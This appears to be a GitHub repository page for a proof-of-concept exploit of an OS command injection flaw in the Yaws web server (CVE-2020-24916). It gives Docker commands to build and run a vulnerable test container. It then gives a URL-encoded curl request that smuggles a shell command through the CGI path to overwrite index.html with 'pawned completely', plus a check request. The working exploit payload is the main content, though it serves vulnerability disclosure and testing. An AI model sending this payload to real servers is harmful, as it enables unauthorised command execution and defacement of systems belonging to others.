Skip to content

vulnbe/poc-yaws-cgi-shell-injection

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

3 Commits
 
 
 
 
 
 

Repository files navigation

OS command injection in Yaws web server (CVE-2020-24916)

Proof of concept

Build test image:

docker build -t vulnbe/yaws-pocs:shell-injection-appmod-cgi -f Dockerfile .

and/or

Run container docker run --rm -d -i -p 127.0.0.1:8000:8080 vulnbe/yaws-pocs:shell-injection-appmod-cgi

curl 'http://127.0.0.1:8000/cgi-bin/%22%60export%20Z=$(pwd%7Ccut%20-c1);echo%20pawned%20completely%3E%3E..$Z%22%22index.html%60%22'
curl http://127.0.0.1:8000/index.html

Credit

Alexey Pronin (@vulnbe)

References

About

Yaws web server OS command injection POC

Topics

Resources

Stars

Watchers

Forks